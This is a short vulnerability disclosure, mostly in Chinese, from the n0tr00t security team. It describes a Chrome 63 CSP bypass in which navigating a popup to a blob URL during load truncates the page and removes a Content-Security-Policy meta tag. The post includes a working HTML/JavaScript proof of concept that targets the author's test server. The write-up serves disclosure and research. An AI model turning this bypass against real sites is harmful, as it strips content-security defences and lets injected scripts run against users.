~# n0tr00t Security Team

Chrome 63.0 CSP Bypass/Page Truncation by navigating to Blob during load

19 Dec 2018 - evi1m0

[+] Author: evi1m0
[+] Team: n0tr00t security team 
[+] From: https://www.n0tr00t.com
[+] Create: 2018-12-19

0x01 TL;DR

我观察到当 try catch 在计时器中使用 location 设置 blob scheme 时,网络请求加载会被随机阻断(页面完成加载但内容部分缺失,有趣的是内容缺失是从上到下的顺序),这个缺陷让我想到能够利用并优先吃掉 head 头中出现的 CSP 防御策略,这样声明的策略就会彻底失效,注入内容能够顺利执行。

比如这样:

<cut>

content...

<meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">

</cut>

content...

here injection

截断 Google or Bing:

https://i.loli.net/2017/11/09/5a040d0918a19.jpg

https://i.loli.net/2017/11/09/5a040d38ba95e.jpg

0x02 PoC

<html>
    <!-- author: evi1m0.bat[at]gmail.com -->
    <script>
        pwn = () => {
            target = 'http://server.n0tr00t.com/chrome/csptest.php?p=' + Date();
            win = window.open(target, "emm", "width=500,height=400");

            setInterval(`try{
                    x = win.location.href;
                } catch(e) {
                    win.location.href = 'blob://';
                }`, 1);
        }
    </script>

    <p>
      <a onclick="pwn()" target="_blank">Click me bypass CSP</a>
      // If it doesn't work, again. :)
    </p>
</html>

0x03 Video

0x04 Track